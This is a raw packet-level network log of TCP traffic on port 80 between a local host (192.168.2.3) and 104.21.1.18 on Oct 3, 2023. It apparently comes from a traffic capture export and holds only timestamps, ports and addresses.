                                                                                                        Oct 3, 2023 18:03:19.486340046 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.486346006 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.486355066 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.486385107 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.486399889 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.486413002 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.486593962 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.486646891 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.486658096 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.486696005 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.486768961 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.486768961 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.486768961 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.486812115 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.486814022 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.486845970 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.486881971 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.486910105 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.486952066 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487010002 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487093925 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487147093 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487163067 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487163067 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487163067 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487204075 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487271070 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487271070 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487284899 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487338066 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487356901 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487400055 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487430096 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487473965 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487551928 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487632990 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487656116 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487656116 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487656116 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487690926 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487706900 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487735033 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487752914 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487763882 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487766981 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487765074 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487778902 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487765074 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487812996 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487828016 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487842083 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487854958 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487857103 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487857103 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487857103 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487857103 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487868071 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487881899 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487896919 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487910986 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487915993 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487916946 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487916946 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487916946 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487922907 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487937927 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487951994 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487965107 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487970114 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487970114 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487977982 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.487970114 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.487992048 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488006115 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488019943 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488022089 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488022089 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488023043 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488034010 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488048077 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488063097 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488076925 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488085032 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488089085 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488085985 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488104105 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488117933 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488132000 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488133907 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488133907 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488133907 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488146067 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488161087 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488174915 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488176107 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488176107 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488177061 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488188982 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488203049 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488204002 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488204002 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488218069 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488230944 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488236904 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488236904 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488244057 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488257885 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488259077 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488257885 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488274097 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488276005 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488287926 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488301039 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488313913 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488313913 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488313913 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488327980 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488343000 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488347054 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488356113 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488365889 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488369942 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488384962 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488384962 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488399982 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488404036 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488415003 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488429070 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488444090 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488446951 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488447905 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488456964 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488471985 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488477945 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488483906 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488477945 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488498926 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488502979 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488512993 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488516092 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488526106 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488538027 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488539934 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488554955 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488567114 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488574982 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488579988 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488574982 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488594055 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488609076 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488610029 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488610029 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488624096 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488637924 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488641977 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488641977 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488651991 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488672972 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488672972 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488672972 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488687038 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488688946 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488702059 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488709927 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488709927 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488717079 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488730907 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488744974 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488749027 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488749027 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488749027 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488760948 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488775969 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488782883 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488782883 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488790035 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488804102 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488816977 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488816977 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488816977 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488831043 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488843918 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488843918 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488846064 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488861084 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488871098 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488873959 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488871098 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488888025 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488893986 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488893986 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488903046 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.488949060 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.488949060 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.589903116 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.590020895 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.590130091 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.590219021 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.590300083 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.590370893 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.590466976 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.590565920 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.590619087 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.590677023 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.590750933 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.590894938 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.590925932 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.590955973 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.590985060 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591013908 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591043949 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591073990 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591104031 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591134071 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591162920 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591191053 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591222048 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591250896 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591280937 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591310024 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591339111 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591367960 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591396093 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591424942 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591454983 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591484070 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591511965 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591542959 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591572046 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591600895 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591630936 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591660976 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591690063 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591717958 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591747046 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591775894 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591806889 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591835022 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591864109 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591892958 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591922045 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591952085 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.591981888 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592010975 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592040062 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592068911 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592097998 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592125893 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592154980 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592184067 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592212915 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592242002 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592269897 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592298985 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592328072 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592355967 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592385054 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592413902 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592413902 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.592413902 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.592413902 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.592444897 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592475891 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592506886 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592530966 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.592535973 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592566013 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592582941 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.592596054 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592626095 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592654943 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592663050 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.592684984 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592700005 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.592715025 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592745066 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592773914 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592808962 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592839003 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592869043 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592897892 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592926025 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592955112 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.592984915 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.593013048 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.593015909 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.593015909 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.593041897 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.593071938 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.593101025 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.593130112 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.593137026 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.593159914 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.593190908 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.593219042 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.593247890 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.593276024 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.593305111 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.593334913 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.593343019 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.593364000 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.593394041 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.593403101 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.593424082 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.593518972 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.593641043 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.593641043 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.596168995 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.596229076 CEST4991280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:03:19.696600914 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.696690083 CEST8049912104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:03:19.696698904 CEST4991280192.168.2.3104.21.1.18
